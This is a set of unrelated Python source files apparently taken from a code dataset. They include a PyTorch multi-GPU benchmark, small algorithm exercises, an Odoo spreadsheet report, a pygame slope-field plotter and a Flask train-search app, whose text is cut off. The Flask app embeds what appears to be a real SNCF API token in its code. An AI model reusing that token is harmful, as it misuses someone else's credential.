batch_size=batch_size, shuffle=True)\n\n######################################################################\n# Simple Model\n# ------------\n#\n# For the demo, our model just gets an input, performs a linear operation, and\n# gives an output. However, you can use ``DataParallel`` on any model (CNN, RNN,\n# Capsule Net etc.)\n#\n# We've placed a print statement inside the model to monitor the size of input\n# and output tensors.\n# Please pay attention to what is printed at batch rank 0.\n#\n\n\nmodel: nn.Module = unet(depth=5, num_convs=5, base_channels=64,\n input_channels=3, output_channels=1)\n\noptimizer = SGD(model.parameters(), lr=0.1)\n\n\n######################################################################\n# Create Model and DataParallel\n# -----------------------------\n#\n# This is the core part of the tutorial. First, we need to make a model instance\n# and check if we have multiple GPUs. If we have multiple GPUs, we can wrap\n# our model using ``nn.DataParallel``. Then we can put our model on GPUs by\n# ``model.to(device)``\n#\n\n\nif torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n # dim = 0 [30, xxx] -> [10, ...], [10, ...], [10, ...] on 3 GPUs\n model = nn.DataParallel(module=model, device_ids=devices)\n#\n model.to(device)\n\n\n######################################################################\n# Run the Model\n# -------------\n#\n# Now we can see the sizes of input and output tensors.\n#\n\n# for i, (input, target) in enumerate(data):\n# print(i, input.shape, target.shape)\n#\n#\n\n\ndef hr() -> None:\n \"\"\"Prints a horizontal line.\"\"\"\n width, _ = click.get_terminal_size()\n click.echo('-' * width)\n\n\ndef log(msg: str, clear: bool = False, nl: bool = True) -> None:\n \"\"\"Prints a message with elapsed time.\"\"\"\n if clear:\n # Clear the output line to overwrite.\n width, _ = click.get_terminal_size()\n click.echo('\\b\\r', nl=False)\n click.echo(' ' * width, nl=False)\n click.echo('\\b\\r', nl=False)\n\n t = time.time() - BASE_TIME\n h = t // 3600\n t %= 3600\n m = t // 60\n t %= 60\n s = t\n\n click.echo('%02d:%02d:%02d | ' % (h, m, s), nl=False)\n click.echo(msg, nl=nl)\n\n\ndef synch_for_all_devices():\n for dv in devices:\n torch.cuda.synchronize(dv)\n\n\ndef run_epoch(epoch: int) -> Tuple[float, float]:\n synch_for_all_devices()\n tick = time.time()\n\n data_trained = 0\n forward_time = []\n backward_time = []\n loss_time = []\n opt_time = []\n for i, (input, target) in enumerate(data):\n input = input.to(device)\n target = target.to(device)\n data_trained += input.size(0)\n\n synch_for_all_devices()\n t1 = time.time()\n output = model(input)\n synch_for_all_devices()\n forward_time.append(time.time() - t1)\n\n synch_for_all_devices()\n t1 = time.time()\n loss = F.binary_cross_entropy_with_logits(output, target)\n synch_for_all_devices()\n loss_time.append(time.time() - t1)\n\n synch_for_all_devices()\n t1 = time.time()\n loss.backward()\n synch_for_all_devices()\n backward_time.append(time.time() - t1)\n\n synch_for_all_devices()\n t1 = time.time()\n optimizer.step()\n optimizer.zero_grad()\n synch_for_all_devices()\n opt_time.append(time.time() - t1)\n\n # 00:01:02 | 1/20 epoch (42%) | 200.000 samples/sec (estimated)\n percent = (i + 1) / len(data) * 100\n throughput = data_trained / (time.time() - tick)\n log('%d/%d epoch (%d%%) | %.3f samples/sec (estimated)'\n '' % (epoch + 1, epochs, percent, throughput), clear=True,\n nl=False)\n\n synch_for_all_devices()\n tock = time.time()\n\n # 00:02:03 | 1/20 epoch | 200.000 samples/sec, 123.456 sec/epoch\n elapsed_time = tock - tick\n throughput = data_trained / elapsed_time\n log('%d/%d epoch | %.3f samples/sec, %.3f sec/epoch'\n '' % (epoch + 1, epochs, throughput, elapsed_time), clear=True)\n\n return throughput, elapsed_time, sum(forward_time), \\\n sum(backward_time), sum(loss_time), sum(opt_time)\n\n\n#global BASE_TIME\nBASE_TIME = time.time()\n\n# for id, data in enumerate(rand_loader):\n# input = data[0]\n# target = data[1]\n# input = input.to(device)\n# target = target.to(device)\n\n# for data in rand_loader:\n# input = data.to(device)\n# output = model(input)\n# print(\"Outside: input size\", input.size(),\n# \"output_size\", output.size())\n\n\nthroughputs = []\nelapsed_times = []\nforward_times = []\nbackward_times = []\nloss_times = []\nopt_times = []\n\nhr()\nsynch_for_all_devices()\nt1 = time.time()\nfor epoch in range(epochs):\n throughput, elapsed_time, forward_time, backward_time, loss_time, opt_time = run_epoch(epoch)\n\n if epoch < skip_epochs:\n continue\n\n throughputs.append(throughput)\n elapsed_times.append(elapsed_time)\n forward_times.append(forward_time)\n backward_times.append(backward_time)\n loss_times.append(loss_time)\n opt_times.append(opt_time)\nhr()\nsynch_for_all_devices()\nt2 = time.time()\n\n# RESULT ======================================================================================\n\n# pipeline-4, 2-10 epochs | 200.000 samples/sec, 123.456 sec/epoch (average)\nn = len(throughputs)\nthroughput = sum(throughputs) / n\nelapsed_time = sum(elapsed_times) / n\nforward_avg_time = sum(forward_times) / n\nbackward_avg_time = sum(backward_times) / n\nloss_avg_time = sum(loss_times) / n\nopt_avg_time = sum(opt_times) / n\nclick.echo('%s | %.3f samples/sec, %.3f sec/epoch (average)'\n '' % (title, throughput, elapsed_time))\nclick.echo('Average Time Per Epoch {}'.format((t2-t1)/epochs))\n\nif save_file is not None:\n with open(save_file, \"a+\") as fp:\n fp.write(\n \"{},{},{},{},{},{},{},{},{},{}\\n\".format(experiment, parallelism, dataset_size,\n batch_size, throughput,\n elapsed_time, forward_avg_time,\n backward_avg_time, loss_avg_time, opt_avg_time))","sub_path":"benchmarks/unet-speed-batch/main_data_parallel.py","file_name":"main_data_parallel.py","file_ext":"py","file_size_in_byte":8197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"280096872","text":"# function to find waiting time for all the processes\ndef findWaitingTime(processes, n, bt, wt):\n # waiting time for first process is 0\n wt[0] = 0\n # calculate waiting time\n for i in range(1, n):\n wt[i] = bt[i - 1] + wt[i - 1]\n\n\n# function to calculate turn around time\ndef findTurnAroundTime(processes, n, bt, wt, tat):\n # calculate turnaround time by adding bt[i]+wt[i]\n\n for i in range(n):\n tat[i] = bt[i] + wt[i]\n\n\n# function to calculate average time\ndef findavgTime(processes, n, bt):\n wt = [0] * n\n tat = [0] * n\n total_wt = 0\n total_tat = 0\n\n # function to find waiting time of all processes\n findWaitingTime(processes, n, bt, wt)\n\n # function to find turnaround time\n findTurnAroundTime(processes, n, bt, wt, tat)\n\n # display processes along with all details\n print(\"processes Burst Time \" + \" waiting time \" + \"turn around time\")\n\n # calculate total waiting time and total turn around time\n for i in range(n):\n\n total_wt = total_wt + wt[i]\n total_tat = total_tat + tat[i]\n print(\" \" + str(i + 1) + \"\\t\\t\" + str(bt[i]) + \"\\t\" + str(wt[i]) + \"\\t\\t\" + str(tat[i]))\n\n print(\"average waiting time is \" + str(total_wt / n))\n print(\"average turnaround time is \" + str(total_tat / n))\n\n\n# source code\nif __name__ == \"__main__\": #while writing main write carefully\n processes = [1, 2, 3, 4, 5, 6, 7]\n n = len(processes)\n\n burst_time = [10, 5, 8, 8, 7, 4, 3]\n\n findavgTime(processes, n, burst_time)\n","sub_path":"sjf.py","file_name":"sjf.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"291160501","text":"# Test the PBM reading on the SPI_LCD12864 LCD graphical screen 128x64\n#\n# bpm & img libraries: https://github.com/mchobby/esp8266-upy/tree/master/FILEFORMAT/imglib\n# lcd12864 library: https://github.com/mchobby/esp8266-upy/tree/master/lcdspi-lcd12864/lib\n# mpy.pbm : image bitmap of older MicroPython logo\n#\n# LCD12864 hardware: https://shop.mchobby.be/fr/gravity-boson/1878-afficheur-lcd-128x64-spi-3-fils-3232100018785-dfrobot.html\n#\n\nfrom machine import SPI, Pin\nfrom lcd12864 import SPI_LCD12864\nfrom img import open_image\nimport time\n\n# PYBStick: S19=mosi, S23=sck, S26=/ss\ncs = Pin( 'S26', Pin.OUT, value=0 )\nspi = SPI( 1 )\nspi.init( polarity=0, phase=1 )\n\nlcd = SPI_LCD12864( spi=spi, cs=cs )\n# texte à X=10, Y=25, couleur=1 (trait)\n#lcd.text( \"MicroPython !\", 10, 25, 1 )\n#lcd.update()\n\ndef color_transform( rgb ):\n\t# transform the clipreader (rgb) color to the target FrameBuffer color (2 colors)\n\treturn 0 if rgb==(0,0,0) else 1\n\nreader = open_image( 'mpy.pbm' )\nreader.clip(0,0,lcd.width,lcd.height)\n# Copy the clipped aread TO a target FrameBuffer (lcd) at is starting\n# position 0,0 for the given clipping width,height .\nreader.copy_to(lcd, 0,0, color_transform )\nlcd.update()\n","sub_path":"FILEFORMAT/examples/testpbmlcd.py","file_name":"testpbmlcd.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"246887086","text":"class Box:\n def __init__(self, index):\n self.index = index\n self.children = []\n\n def count(self, used):\n if not used.get(self.index, False):\n used[self.index] = True\n local_count = 1\n for child in self.children:\n local_count += child.count(used)\n return local_count\n return 0\n\n def __repr__(self):\n children = [x.index for x in self.children]\n return \"(index={},children={})\".format(self.index, children)\n\n\ndef boxes():\n num_boxes = int(input())\n boxes = {}\n for i in range(num_boxes):\n boxes[i+1] = Box(i+1)\n\n for i,index in enumerate([int(x) for x in input().split(\" \")]):\n if index != 0:\n boxes[index].children.append(boxes.get(i+1))\n\n num_queries = int(input())\n for i in range(num_queries):\n used = {}\n nums = [int(x) for x in input().split(\" \")[1:]]\n curr_boxes = [boxes[x] for x in nums]\n num_boxes = [x.count(used) for x in curr_boxes]\n print(sum(num_boxes))\n\nboxes()\n\n","sub_path":"boxes/boxes.py","file_name":"boxes.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146767737","text":"from collections import defaultdict\nfrom math import ceil\n\ndef parse_substance(s):\n amount, chemical = s.split()\n return chemical, int(amount)\n\n\ndef parse_reaction(reaction):\n source, result = reaction.split(' => ')\n output, num_units = parse_substance(result)\n ingredients = dict(parse_substance(s) for s in source.split(', '))\n return (output, (num_units, ingredients))\n\n\ndef parse_input(s):\n return dict(parse_reaction(line) for line in s.splitlines())\n\nwith open('./inputs/day14') as f:\n reactions = parse_input(f.read())\n\ndef calculate_components(chemical, amount, wastes):\n quantity, ingredients = reactions[chemical]\n multiples = ceil(amount / quantity)\n\n wastes[chemical] += multiples * quantity - amount\n\n components_needed = dict()\n for chemical, amount in ingredients.items():\n total_amount_needed = amount * multiples\n usable_waste = min(total_amount_needed, wastes[chemical])\n total_amount_needed -= usable_waste\n wastes[chemical] -= usable_waste\n components_needed[chemical] = total_amount_needed\n\n return components_needed\n\n\ndef calculate_needed_ore(fuel):\n substances_needed = defaultdict(int)\n substances_needed['FUEL'] = fuel\n\n wastes = defaultdict(int)\n\n total_ore = 0\n while substances_needed:\n chemical, amount = substances_needed.popitem()\n\n components_needed = calculate_components(chemical, amount, wastes)\n if 'ORE' in components_needed:\n total_ore += components_needed.pop('ORE')\n\n for chemical, amount in components_needed.items():\n substances_needed[chemical] += amount\n\n return total_ore\n\ndef binary_search(start, end, fun):\n while end - start > 1:\n middle = start + (end - start) // 2\n if fun(middle) == -1:\n end = middle\n else:\n start = middle\n return start\n\nprint(f'First solution {calculate_needed_ore(1)}')\nprint(f'Second soultion {int(binary_search(0, 1e12, lambda fuel: -1 if calculate_needed_ore(fuel) > 1e12 else 1))}')\n","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"65971709","text":"Price = {\n \"HP\": 600,\n \"DELL\": 650,\n \"MACBOOK\": 12000,\n \"ASUS\": 400,\n \"ACER\": 350,\n \"TOSHIBA\": 600,\n \"FUJITSU\": 900,\n \"ALIENWARE\": 1000\n}\nKho = {\n \"HP\": 20 ,\n \"DELL\": 50,\n \"MACBOOK\": 12,\n \"ASUS\": 30,\n \"ACER\": 10,\n \"TOSHIBA\": 90,\n \"FUJITSU\": 80,\n \"ALIENWARE\": 15\n}\nprint('Gia tri 5 máy ASUS: ',5*Price['ASUS'] )\na = input(\" Nhập máy bạn muốn mua: \")\nb = input(\" Nhập số lượng máy đó: \")\nprint(\"Giá trị \",b,\"máy \" , a ,\"la: \", int(b)*Price[a])\nKho[a] = Kho[a] - int(b)\nprint(Kho)\n","sub_path":"Buoi5/HomeWork/Part5.py","file_name":"Part5.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516158953","text":"# -*- coding: utf-8 -*-\nfrom openerp.addons.report_xls.report_xls import report_xls\nfrom salesman_summary_parser import sm_report_parser\nimport xlwt\nimport time\nimport datetime\n\n\n\nclass sm_xls(report_xls):\n def generate_xls_report(self, _p, _xs, data, objects, wb):\n ws = wb.add_sheet(_p.report_name[:31])\n ws.panes_frozen = True\n ws.remove_splits = True\n ws.portrait = 1\n ws.fit_width_to_pages = 1\n row_pos = 0\n ws.set_horz_split_pos(row_pos)\n row_pos += 1\n ws.header_str = self.xls_headers['standard']\n ws.footer_str = self.xls_footers['standard']\n _xs.update({\n 'xls_title': 'font: bold true, height 350;'\n })\n _myxs = {'borders': 'borders: ' 'top thin, bottom thin',\n 'top_bottom_lined': 'borders: ' 'top medium, bottom thin',\n }\n cell_right_bold = xlwt.easyxf(_xs['right'] + _xs['bold'], num_format_str=report_xls.decimal_format)\n cell_center_bold_no = xlwt.easyxf(_xs['center'] + _xs['bold'])\n cell_center_bold = xlwt.easyxf(_xs['center'] + _xs['bold']+ _myxs['top_bottom_lined'])\n cell_style = xlwt.easyxf(_xs['xls_title']+_xs['center'])\n cell_center = xlwt.easyxf(_xs['center'])\n cell_right = xlwt.easyxf(_xs['right'], num_format_str=report_xls.decimal_format)\n cell_left_b = xlwt.easyxf(_xs['left']+_xs['bold'])\n report_name =_p.report_name\n c_specs = [('report_name', 8, 0, 'text', report_name)]\n row_data = self.xls_row_template(c_specs, ['report_name'])\n row_pos = self.xls_write_row(ws, row_pos, row_data, row_style=cell_style)\n ws.row(row_pos-1).height_mismatch = True\n ws.row(row_pos-1).height = 220*2\n row_pos += 1\n get_line = _p.get_lines_1(objects, data)\n top2 = [('entry1', 3, 0, 'text', str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M %p\"))),\n ('entry2', 3, 0, 'text', get_line['company'])]\n row_data = self.xls_row_template(top2, [x[0] for x in top2])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_left_b)\n row_pos += 1\n\n top3 = [('entry1', 8, 0, 'text', \"Aging Report\")]\n row_data = self.xls_row_template(top3, [x[0] for x in top3])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold_no)\n row_pos += 2\n\n top4 = [('entry1', 2, 0, 'text', \"Chart of Account\"),\n ('entry2', 2, 0, 'text', \"Financial Year\"),\n ('entry3', 2, 0, 'text', \"Date\"),\n ('entry4', 2, 0, 'text', \"Period Length(Days)\")]\n row_data = self.xls_row_template(top4, [x[0] for x in top4])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold_no)\n\n top6 = [('entry1', 2, 0, 'text', get_line['one']),\n ('entry2', 2, 0, 'text', get_line['financial_year']),\n ('entry3', 2, 0, 'text', data['form']['date_from']),\n ('entry4', 2, 0, 'text', data['form']['period_length'])]\n row_data = self.xls_row_template(top6, [x[0] for x in top6])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center)\n\n top5 = [('entry1', 2, 0, 'text', \"Partner's\"),\n ('entry2', 2, 0, 'text', \"Analysis Direction\"),\n ('entry3', 2, 0, 'text', \"Target Move\"),\n ('entry4', 2, 0, 'text', \"Currency\")]\n row_data = self.xls_row_template(top5, [x[0] for x in top5])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold_no)\n\n top7 = [('entry1', 2, 0, 'text', get_line['result_selection']),\n ('entry2', 2, 0, 'text', data['form']['direction_selection']),\n ('entry3', 2, 0, 'text', data['form']['target_move']),\n ('entry4', 2, 0, 'text', get_line['symbol'])]\n row_data = self.xls_row_template(top7, [x[0] for x in top7])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center)\n row_pos += 1\n top8 = [('entry1', 2, 0, 'text', \"Sales Person\"),\n ('entry2', 1, 0, 'text', \"Not due\"),\n ('entry3', 1, 0, 'text', data['form']['4']['name']),\n ('entry4', 1, 0, 'text', data['form']['3']['name']),\n ('entry5', 1, 0, 'text', data['form']['2']['name']),\n ('entry6', 1, 0, 'text', data['form']['1']['name']),\n ('entry7', 1, 0, 'text', data['form']['0']['name']),\n ('entry8', 1, 0, 'text', \"Total\")]\n row_data = self.xls_row_template(top8, [x[0] for x in top8])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold)\n\n form = data['form']\n fun_2_getline = _p.get_lines_abroad(form, objects, data)\n get_direction = _p.get_direction(6)\n get_for_period_4 = _p.get_for_period(4)\n get_for_period_3 = _p.get_for_period(3)\n get_for_period_2 = _p.get_for_period(2)\n get_for_period_1 = _p.get_for_period(1)\n get_for_period_0 = _p.get_for_period(0)\n get_for_period_5 = _p.get_for_period(5)\n if fun_2_getline:\n currency_symbol= [('entry1', 2, 0, 'text', \"Account Total\", None, cell_left_b),\n ('entry2', 1, 0, 'text', str(get_direction)+get_line['symbol']),\n ('entry3', 1, 0, 'text', str(get_for_period_4)+get_line['symbol']),\n ('entry4', 1, 0, 'text', str(get_for_period_3)+get_line['symbol']),\n ('entry5', 1, 0, 'text', str(get_for_period_2)+get_line['symbol']),\n ('entry6', 1, 0, 'text', str(get_for_period_1)+get_line['symbol']),\n ('entry7', 1, 0, 'text', str(get_for_period_0)+get_line['symbol']),\n ('entry8', 1, 0, 'text', str(get_for_period_5)+get_line['symbol'])]\n row_data = self.xls_row_template(currency_symbol, [x[0] for x in currency_symbol])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold)\n\n sales_persn_list = []\n sep_inv_by_partner = _p.get_sep_inv_by_partner(form, objects, data)\n needed = sep_inv_by_partner\n\n for i in needed:\n if i['sales_person'] not in sales_persn_list:\n sales_persn_list.append(i['sales_person'])\n dict_1 = {}\n for sp in sales_persn_list:\n dict_1[sp] = {'no_due': 0, '4': 0, '3': 0, '2': 0, '1': 0, '0': 0, 'total': 0}\n for n in needed:\n if n['sales_person'] == sp:\n dict_1[sp] = {'no_due': dict_1[sp]['no_due'] + n['no_due'], '4': dict_1[sp]['4'] + n['4'], '3': dict_1[sp]['3'] + n['3'], '2': dict_1[sp]['2'] + n['2'], '1': dict_1[sp]['1'] + n['1'], '0': dict_1[sp]['0'] + n['0'], 'total': dict_1[sp]['0'] + n['0'] + dict_1[sp]['1'] + n['1'] + dict_1[sp]['2'] + n['2'] + dict_1[sp]['3'] + n['3'] + dict_1[sp]['4'] + n['4']+dict_1[sp]['no_due'] + n['no_due']}\n\n for line in dict_1.keys():\n if line == \" \":\n patner_det = [('entry1', 2, 0, 'text', \"Unknown\", None, cell_left_b),\n ('entry2', 1, 0, 'number', dict_1[line]['no_due']),\n ('entry3', 1, 0, 'number', dict_1[line]['4']),\n ('entry4', 1, 0, 'number', dict_1[line]['3']),\n ('entry6', 1, 0, 'number', dict_1[line]['2']),\n ('entry7', 1, 0, 'number', dict_1[line]['1']),\n ('entry9', 1, 0, 'number', dict_1[line]['0']),\n ('entry10', 1, 0, 'number', dict_1[line]['total'], None, cell_right_bold)]\n row_data = self.xls_row_template(patner_det, [x[0] for x in patner_det])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_right)\n else:\n patner_det = [('entry1', 2, 0, 'text', line, None, cell_left_b),\n ('entry2', 1, 0, 'number', dict_1[line]['no_due']),\n ('entry3', 1, 0, 'number', dict_1[line]['4']),\n ('entry4', 1, 0, 'number', dict_1[line]['3']),\n ('entry6', 1, 0, 'number', dict_1[line]['2']),\n ('entry7', 1, 0, 'number', dict_1[line]['1']),\n ('entry9', 1, 0, 'number', dict_1[line]['0']),\n ('entry10', 1, 0, 'number', dict_1[line]['total'], None, cell_right_bold)]\n row_data = self.xls_row_template(patner_det, [x[0] for x in patner_det])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_right)\nsm_xls('report.sm_report_xls.report_xls', 'account.move', parser=sm_report_parser)\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"brothers/partner_aging_xls/report/salesman_summary_xls.py","file_name":"salesman_summary_xls.py","file_ext":"py","file_size_in_byte":8905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52959878","text":"import pygame\r\nimport math\r\n\r\n\r\nclass MathFun:\r\n def __init__(self, InStr, NumParams = 2):\r\n self.Str = InStr\r\n self.Exc = compile(InStr, \"\", \"eval\")\r\n self.NumParams = NumParams\r\n def Eval(self, *Args):\r\n try:\r\n if self.NumParams == 2:\r\n x, y = Args[0], Args[1]\r\n return eval(self.Exc)\r\n elif self.NumParams == 1:\r\n x = Args[0]\r\n return eval(self.Exc)\r\n except:\r\n return None\r\nclass Integral:\r\n def __init__(self, Func):\r\n self.Func = Func\r\n def EvalLeft(self, x0, x1, step):\r\n Rtn = 0\r\n x = x0\r\n while x < x1:\r\n Rtn += eval(self.Func.Exc) * step\r\n x += step\r\n return Rtn\r\n def EvalRight(self, x0, x1, step):\r\n Rtn = 0\r\n x = x0\r\n while x < x1:\r\n x += step\r\n Rtn += eval(self.Func.Exc) * step\r\n return Rtn\r\n def EvalTrap(self, x0, x1, step):\r\n Rtn = 0\r\n x = x0\r\n Prev = eval(self.Func.Exc) / .5\r\n x += step\r\n while x < x1:\r\n Mid = eval(self.Func.Exc) / .5\r\n Rtn += (Prev + Mid) * step\r\n Prev = Mid\r\n x += step\r\n return Rtn\r\ndef ln(x):\r\n return math.log1p(x-1)\r\ndef logbase(b, x):\r\n return math.log(x, b)\r\ndef GetLenX(Len, Slope):\r\n return (float(Len ** 2) / ((Slope ** 2) + 1)) ** .5\r\npi = math.pi\r\nsin = math.sin\r\ncos = math.cos\r\ntan = math.tan\r\narcsin = math.asin\r\narccos = math.acos\r\narctan = math.atan\r\nlog = math.log10\r\ne = math.e\r\nLnColor = (255, 255, 255)\r\nScale = .08\r\nScaleInt = .01\r\nLnW = 1\r\ndef DrawLn(x, y, Slope, Surf, Len, Col):\r\n AbsX = GetLenX(Len / 2, Slope)\r\n AbsY = (Len / 2) ** 2 - AbsX ** 2\r\n AbsX1 = x - AbsX\r\n AbsX2 = x + AbsX\r\n AbsY1 = y + AbsY\r\n AbsY2 = y - AbsY\r\n AbsX1 += Base[0]\r\n AbsX2 += Base[0]\r\n AbsY1 += Base[1]\r\n AbsY2 += Base[1]\r\n pygame.draw.line(Surf, Col, (AbsX1, AbsY1), (AbsX2, AbsY2), LnW)\r\nColGrid = [(0, 0, 255), (255, 0, 255), (255, 255, 255), (0, 255, 255), (255, 0, 0)]\r\ndef DrawGrid(Surf, Func, Width, Height, Spacing):\r\n for y in xrange(-Height / 2, Height / 2, Spacing):\r\n for x in xrange(-Width / 2, Width / 2, Spacing):\r\n Slope = Func.Eval(float(Scale * x) / Spacing + FunOff[0], -(float(Scale * y) / Spacing + FunOff[1]))\r\n if Slope != None:\r\n Quadrant = 0\r\n x1 = float(Scale * x) / Spacing + FunOff[0]\r\n y1 = float(Scale * y) / Spacing + FunOff[1]\r\n if x1 < 0 and y1 <= 0:\r\n Quadrant = 1\r\n elif x1 > 0 and y1 > 0:\r\n Quadrant = 3\r\n elif x1 <= 0 and y1 > 0:\r\n Quadrant = 2\r\n DrawLn(x, y, Slope, Surf, Spacing, ColGrid[Quadrant])\r\npygame.display.init()\r\npygame.font.init()\r\nMonW = pygame.display.Info().current_w\r\nMonH = pygame.display.Info().current_h\r\nOrigW = 1280\r\nOrigH = 700\r\nSurface = pygame.display.set_mode((OrigW, OrigH))\r\nFunOff = (0, 0)\r\nCurrFun = None\r\nDragOn = False\r\nSpacer = 8\r\nCurrW, CurrH = Surface.get_size()\r\nBase = (CurrW/2, CurrH/2)\r\nIsFullscr = False\r\n\r\nwhile True:\r\n Evt = pygame.event.wait()\r\n if Evt.type == pygame.QUIT:\r\n break\r\n elif Evt.type == pygame.MOUSEBUTTONDOWN:\r\n if Evt.button == 5:\r\n Scale += ScaleInt\r\n elif Evt.button == 4 and Scale >= ScaleInt:\r\n Scale -= ScaleInt\r\n elif Evt.button == 1:\r\n DragOn = True\r\n if CurrFun != None:\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\n elif Evt.type == pygame.MOUSEBUTTONUP:\r\n if Evt.button == 1:\r\n DragOn = False\r\n elif Evt.type == pygame.MOUSEMOTION:\r\n if DragOn and CurrFun != None:\r\n FunOff = (FunOff[0] - (Evt.rel[0] * Scale) / Spacer), (FunOff[1] - (Evt.rel[1] * Scale) / Spacer)\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\n elif Evt.type == pygame.KEYDOWN:\r\n if Evt.key == pygame.K_RETURN:\r\n CurrFun = MathFun(raw_input(\"give me function of x and y: \"))\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\n elif Evt.key == pygame.K_c:\r\n if CurrFun != None:\r\n FunOff = (0, 0)\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\n elif Evt.key == pygame.K_F11:\r\n IsFullscr = not IsFullscr\r\n if IsFullscr: Surface = pygame.display.set_mode((MonW, MonH), pygame.FULLSCREEN)\r\n else: Surface = pygame.display.set_mode((OrigW, OrigH))\r\n CurrW, CurrH = Surface.get_size()\r\n Base = (CurrW / 2, CurrH / 2)\r\n if CurrFun != None:\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\npygame.quit()\r\n","sub_path":"SlopeField.py","file_name":"SlopeField.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"119922512","text":"import math\r\n\r\nclass QuadraticEquation(object):\r\n def __init__(self, data):\r\n self.a = data['a']\r\n self.b = data['b']\r\n self.c = data['c']\r\n \r\n def get_discr(self):\r\n self.d = self.b ** 2 - 4 * self.a * self.c\r\n return self.d\r\n \r\n def get_eq_root(self, order=1):\r\n if order==1:\r\n x = (-self.b + self.d ** (1/2.0)) / 2*self.a\r\n else:\r\n x = (-self.b - self.d ** (1/2.0)) / 2*self.a\r\n return x\r\n","sub_path":"quadratic/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"137471102","text":"# -*- coding: utf-8 -*-\r\nfrom zeep import Client\r\nfrom flask import Flask, request, render_template\r\n\r\n#import keyring\r\nimport requests\r\nfrom datetime import datetime, date, time\r\n \r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template(\"Accueil.html\")\r\n\r\n@app.route('/formCalcul')\r\ndef formCalcul():\r\n listgare = List_Gare()\r\n return render_template(\"formCalcul.html\", listgare=listgare)\r\n\r\n@app.route('/formCalculsimple')\r\ndef formCalculsimple():\r\n return render_template(\"formCalculsimple.html\")\r\n\r\n@app.route('/Calculsimple', methods=['GET','POST'])\r\ndef Calculsimple():\r\n if request.method == 'POST':\r\n result = request.form\r\n town1 = result['town1']\r\n town2 = result['town2']\r\n daydepart = result['daydepart']\r\n timedepart = result['timedepart']\r\n devise = result['devise']\r\n \r\n uic1 = Get_UIC(town1)\r\n uic2 = Get_UIC(town2)\r\n \r\n distance = Calcul_distance(town1,town2)\r\n \r\n http_rest=\"http://trouve-ton-train-rest.herokuapp.com/CalculPrix\"\r\n response = requests.get( http_rest, params = {'distance' : float(distance), 'devise' : devise })\r\n prixtrajet = response.json()\r\n \r\n departure=daydepart+\" \"+timedepart\r\n dt = datetime.strptime(departure, \"%Y-%m-%d %H:%M\")\r\n datetimesncf = convert_time(dt)\r\n \r\n nexttrain = Next_train(uic1,uic2,datetimesncf)\r\n\r\n return render_template(\"result.html\", town1=town1, town2=town2, result=round(distance,2), prix=round(prixtrajet['prix'],2), devise=devise, tableau=nexttrain)\r\n \r\n@app.route('/Calcul', methods=['GET','POST'])\r\ndef Calcul():\r\n if request.method == 'POST':\r\n result = request.form\r\n uic1 = result['town1']\r\n uic2 = result['town2']\r\n daydepart = result['daydepart']\r\n timedepart = result['timedepart']\r\n devise = result['devise']\r\n \r\n token_auth = '5e044075-940e-4989-87ba-202e60af9e75'\r\n url1=\"https://api.sncf.com/v1/coverage/sncf/stop_areas/\"+uic1\r\n url2=\"https://api.sncf.com/v1/coverage/sncf/stop_areas/\"+uic2\r\n api1 = requests.get(url1, auth=(token_auth, '')).json()\r\n api2 = requests.get(url2, auth=(token_auth, '')).json()\r\n name1 = api1['stop_areas'][0]['administrative_regions'][0]['name']\r\n name2 = api2['stop_areas'][0]['administrative_regions'][0]['name']\r\n lat1 = api1['stop_areas'][0]['administrative_regions'][0]['coord']['lat']\r\n lon1 = api1['stop_areas'][0]['administrative_regions'][0]['coord']['lon']\r\n lat2 = api2['stop_areas'][0]['administrative_regions'][0]['coord']['lat']\r\n lon2 = api2['stop_areas'][0]['administrative_regions'][0]['coord']['lon']\r\n \r\n distance = Calcul_distance_uic(lon1, lon2, lat1, lat2)\r\n \r\n 